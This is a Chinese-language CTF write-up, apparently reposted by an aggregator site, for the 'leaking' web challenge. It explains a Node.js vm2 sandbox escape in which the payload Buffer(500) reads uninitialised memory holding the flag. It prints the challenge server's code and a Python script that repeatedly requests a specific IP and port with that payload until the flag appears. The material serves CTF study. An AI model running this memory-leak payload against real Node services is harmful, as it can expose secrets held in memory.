這題考的是node.js沙箱逃逸，之前沒遇到過，屬于是又學到新知識了
具體看這一篇，https://juejin.cn/post/6889226643525599240
簡單說一下原理吧，就是理論上沙箱里的代碼只能與vm上下文打交道，可是vm上下文確是可以與沙箱外的代碼和變量打交道的，因此，如果我們能夠構造請求，
使得vm上下文代替我們去讀取利用沙箱外的代碼和變量的話，那就形成了沙箱逃逸，拿這一題來舉個例吧
先看一下代碼

"use strict";var randomstring = require("randomstring"); var express = require("express"); var {VM } = require("vm2"); var fs = require("fs");var app = express(); var flag = require("./config.js").flagapp.get("/", function(req, res) {res.header("Content-Type", "text/plain");/* Orange is so kind so he put the flag here. But if you can guess correctly :P */eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\";")if (req.query.data && req.query.data.length <= 12) {var vm = new VM({timeout: 1000});console.log(req.query.data);res.send("eval ->" + vm.run(req.query.data));} else {res.send(fs.readFileSync(__filename).toString());} }); app.listen(3000, function() {console.log("listening on port 3000!"); });

由于第一個eval把flag讀入了在內存中的全局變量
所以只要我們能通過沙箱里的eval去讀取內存中的內容的話，就可以形成沙箱逃逸
這題甚至都沒有用到什么原型鏈，直接用Buffer()函數用于讀取內存的內容，可以通過這個函數直接去讀取全局內存中的內容
由于內存的保護機制，并不是每一次都能讀取到含有flag內容的代碼的，多運行幾次就好了，上腳本

# encoding=utf-8import requests import time import re url = 'http://111.200.241.244:49433/?data=Buffer(500)' response = '' while 'flag' not in response:req = requests.get(url)response = req.textprint(req.status_code)time.sleep(0.1)if 'flag{' in response:print(re.findall(r'flag{.+}',response))break

參考視頻鏈接：https://www.bilibili.com/video/BV11f4y1n71A/

總結

以上是生活随笔為你收集整理的攻防世界 WEB leaking的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。